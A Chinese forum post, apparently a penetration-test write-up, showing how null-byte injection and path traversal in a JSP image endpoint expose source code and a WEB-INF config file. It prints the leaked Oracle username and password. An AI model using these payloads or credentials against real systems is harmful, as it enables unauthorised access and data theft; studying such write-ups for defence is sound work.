我精减一下内容贴出来:
tomcat+jboss,站点交互功能很少,漏洞扫描器没发现什么问题。
手工一个一个文件慢慢翻,翻了好多发现有的文章提示“没有图片”,也就是说可能有的文章附有图片了。一个个找终于看到一张图片,右键查看一下图片URL,发现有些可疑:
http://webhost/AjaxAction.do?act ... 01110623085223t.jpg
试一下改变成:
http://webhost/AjaxAction.do?actionType=showimage&id=111
出错了:
java.io.IOException: 文件不是图片格式,请检查后继续!只能输出gif、jpg、png三种格式文件!
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:68)
cn.com.chx.eform.AjaxAction.showImage(AjaxAction.java:265)
再试试有没有过滤结束符构造一个合法的:
http://webhost/AjaxAction.do?act ... &id=111.gif
非常有意思,不但得到了web path而且还成功欺骗了程序:
java.io.FileNotFoundException: E:\webhost\server\default\deploy\root.war\WEB-INF\resource\111?3;.gif (系统找不到指定的文件。)
java.io.FileInputStream.open(Native Method)
java.io.FileInputStream.<init>(FileInputStream.java:106)
cn.com.chx.util.ImageUtil.outImageStream(ImageUtil.java:74) 再试试能不能返回上级目录,因为上面暴出了web path,所以退只要两格:http://webhost/AjaxAction.do?act ... ../../login.jsp.gif 哈哈,直接看到了jsp源码~~~接下来可以去尝试读一下web-inf下面的xml文件:http://webhost/AjaxAction.do?act ... /chx-config.xml.gif 找到了最重要的oracle密码(直接访问xml访问不了):- <database> <type>oracle</type> <jdbcdriver>oracle.jdbc.driver.OracleDriver</jdbcdriver> <url>jdbc racle:thin localhost:1521rcl</url> <user>xbox</user> <password>xbox123qwe@#$_web</password> </database> 做渗透测试项目就做到这就可以了,接下来要绕过fw利用oracle获得个systemshell也并非难事 |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
使用道具 举报
使用道具 举报